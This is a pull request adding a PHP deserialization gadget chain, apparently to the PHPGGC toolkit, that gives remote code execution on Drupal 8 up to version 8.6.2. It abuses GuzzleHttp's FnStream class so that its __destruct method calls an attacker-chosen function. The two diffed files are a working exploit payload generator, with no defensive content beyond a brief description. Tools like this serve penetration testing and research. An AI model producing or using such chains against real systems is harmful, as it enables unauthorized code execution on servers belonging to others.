### PR TITLE
Drupal RCE 1

### DIFF
--- a/gadgetchains/Drupal/RCE/1/chain.php
+++ b/gadgetchains/Drupal/RCE/1/chain.php
@@ -1,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Drupal;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE
+{
+    public $version = '<= 8.6.2';
+    public $vector = '__destruct';
+    public $author = 'marcvelmer';
+    public $informations = 'This chain expects a PHP function without parameters, such as phpinfo.';
+
+    public function generate(array $parameters)
+    {
+        $code = $parameters['code'];
+
+        return new \GuzzleHttp\Psr7\FnStream(
+            $code
+        );
+    }
+}

--- a/gadgetchains/Drupal/RCE/1/gadgets.php
+++ b/gadgetchains/Drupal/RCE/1/gadgets.php
@@ -1,0 +1,14 @@
+<?php
+
+namespace GuzzleHttp\Psr7
+{
+    class FnStream
+    {
+        public $_fn_close;
+
+        function __construct($cmd)
+        {
+            $this->_fn_close = $cmd;
+        }
+    }
+}


### PR DESCRIPTION
New chain for Drupal 8.

The class is from the vendor folder (GuzzleHttp\Psr7\FnStream), not from the Drupal core classes, but is present in all Drupal 8 installations.

Cheers,

Marc